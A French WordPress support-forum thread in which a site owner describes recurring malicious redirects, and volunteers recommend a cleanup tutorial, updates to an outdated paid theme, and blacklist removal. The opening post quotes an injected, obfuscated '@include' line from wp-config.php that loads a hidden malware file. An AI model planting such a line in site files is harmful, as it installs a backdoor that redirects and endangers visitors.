- WordPress :5.7
- Statut : non résolu
- Ce sujet contient 16 réponses, 4 participants et a été mis à jour pour la dernière fois par
Flobogo, le il y a 7 mois et 2 semaines.
-
AuteurMessages
-
6 avril 2021 à 18 h 02 min #2374510
Bonjour,
je reviens vers vous car nous avons un site et quand on va dessus de temps en temps on est redirigé vers une publicité tout de suite sans accès à notre site.
Sur la page est indiqué je ne suis pas un robot avec un fond blanc.
On à detecter avec wordfence des codes ajouté sur des fichiers et des dossier avec des noms bizarre à la racine du serveur tout à été supprimer et la ce matin tout est revenu.
excemple dans wp-config.php cette ligne en haut de la page.
@include « 57h157m145/143a154e156d157r161u57w167w57w160-143o156t145n164/165p154o141d163/62061957.64761c142071856i143o »;
On a installé aussi stop spams mais rien n’y fait et modifier le mot de passe FTP aussi.
Merci pour vos conseils.
6 avril 2021 à 18 h 06 min #23745136 avril 2021 à 18 h 19 min #23745166 avril 2021 à 18 h 21 min #2374518que dois-je faire à ton avis cela n’a pas l’air très bon ?Merci
6 avril 2021 à 18 h 31 min #2374520Non, ce n’est pas bon mais ça se répare même si c’est casse-pieds. Il faut suivre le tuto que @flobogo a pris la peine d’écrire. Un peu de travail et le problème sera réglé. Après il faudra sécuriser le site s’il ne l’est pas déjà. Après, je vois que votre site est sur liste noire. Une fois que tout sera nettoyé il faudra l‘en sortir.
-
Cette réponse a été modifiée le il y a 3 années et 10 mois par
ferman.
6 avril 2021 à 18 h 39 min #2374523merci si je renomme mon theme et dossier d’extension comme dans l’etape 1 cela ne risque t’il pas de perdre mon site web ? MERCI
6 avril 2021 à 18 h 41 min #2374524Qu’est ce que cela change d’être en liste noir car notre site est tout de même indexé sur Google ? MERCI
6 avril 2021 à 18 h 54 min #2374526C’est le cas pour le moment mais ça risque d’évoluer. Ensuite, s’il est sur liste noire c’est qu’il renvoie vers d’autres adresses, ce que vous constatez et que certains de vos visiteurs, sinon tous, constatent aussi certainement. Vous ne savez pas vers où ces redirections se font ou se feront dans l’avenir; peut être vers des sites pourris.
Par exemple l’adresse du site dans les résultats de recherche Google peut renvoyer vers un site de vente de viagra (un grand classique), maintenant ou plus tard. Vous avez regardé dans les résultats Google ?
-
Cette réponse a été modifiée le il y a 3 années et 10 mois par
ferman.
6 avril 2021 à 19 h 09 min #2374533ok je comprends je vais regarder cela par contre si je suis l’etape 1 mon site sera toujours accessible ;
renomme mon theme et dossier d’extension comme dans l’etape 1 cela ne risque t’il pas de perdre mon site web merci
6 avril 2021 à 19 h 12 min #2374536si je modifie aussi le mot de passe de la base de donnée si cela est de l’injection cela regalèrerai pas le probleme aussi ? MERCI
6 avril 2021 à 19 h 40 min #2374542Comme vous le voyez vous même dans wp-config, ce sont d’abord les fichiers du site qui sont corrompus. Il doit y en avoir d’autres (par ex wp-load). Il peut aussi y avoir des fichiers additionnels avec des noms trompeurs style wordpress.load ou autre. Changer le mdp de la base de données est inutile à ce stade: le loup est déjà dans la bergerie et il ne sert à rien de fermer la porte. D’ailleurs, la base de donnée est secondaire. C’est juste un espace de stockage et s’il n’y a pas de commande pour stocker ou récupérer les données indésirables, elle est inoffensive.
renomme mon theme et dossier d’extension comme dans l’etape 1 cela ne risque t’il pas de perdre mon site web merci
Non, enfin si pour le moment mais à la fin vous renommerez ces dossiers et ce sera comme avant. Bien sûr pendant le temps de la réparation votre site sera indisponible. Choisissez un moment tranquille, mettez en maintenance et faites le nettoyage en suivant complètement le tuto (ça ne devrait pas prendre plus d’une heure ou deux). Lisez bien le tuto avant de commencer. Si vous avez des questions, posez-les.
-
Cette réponse a été modifiée le il y a 3 années et 10 mois par
ferman.
6 avril 2021 à 21 h 26 min #2374547Le thème est the7 mais nous avons pas les codes d’achat cela ne nous empêcherons pas de tout réinstaller ? Merci.
6 avril 2021 à 21 h 37 min #2374548Nous avons une ancienne version de WordPress et devont nous effectuer la maj du wordpress comme indique en 2 cas de l’aide ou effectuer le 1er cas.
Merci.
6 avril 2021 à 23 h 36 min #2374556Le plus important est de vous débarrasser du problème et pour ça effectuer toutes les étapes jusqu’à « Bon courage : il y a du travail,… » Pour les mises à jour ça viendra après mais elles seront obligatoires. Si vous avez d’anciennes versions de wp, d’anciennes extensions ou si votre thème n’a pas été mis à jour depuis longtemps c’est la porte ouverte au piratage.
Pour votre theme the 7, c’est un thème payant mais si vous ne le supprimez pas de wp-content vous pourrez le réactiver. Comme dit ci-dessus, il y a quand même un risque. Il y en a un autre: votre ancienne version (elle date de quand?) risque de ne pas être compatible avec les versions modernes de wordpress (laquelle avez-vous?) et donc il faudrait normalement aussi le mettre à jour. A vous de voir. De toute façon vous serez obligée de le faire tôt ou tard, wordpress changeant très rapidement..
7 avril 2021 à 0 h 10 min #2374558Bonjour,
Votre site est indiscutablement piraté. Vous reconnaissez qu’il n’est pas à jour, avec un thème payant non mis à jour. Le thème est probablement infecté, directement ou via une extension tierce. Il faudra racheter la version à jour, ou changer de thème.
Comme @ferman vous l’a dit, la seule solution, c’est de suivre entièrement le tuto.
Si vous voulez être aidée plus, il faut au minimum nous donner l’URL du site. Vous en êtes à plus de 65 posts sur ce forum, avec 47 topics créés, et vous n’avez jamais indiqué votre configuration (ce qui explique au passage que la plupart du temps, vous n’avez pas ou peu de réponses à vos questions).
Si votre site était celui de la NASA, on comprendrait qu’il soit important de ne pas divulguer l’URL et la configuration, mais je ne pense pas que ce soit le cas. 😁
A vous de voir : si vous voulez garder secrète votre configuration, alors il va falloir vous débrouiller seule. -
Cette réponse a été modifiée le il y a 3 années et 10 mois par
-
AuteurMessages
- Vous devez être connecté pour répondre à ce sujet.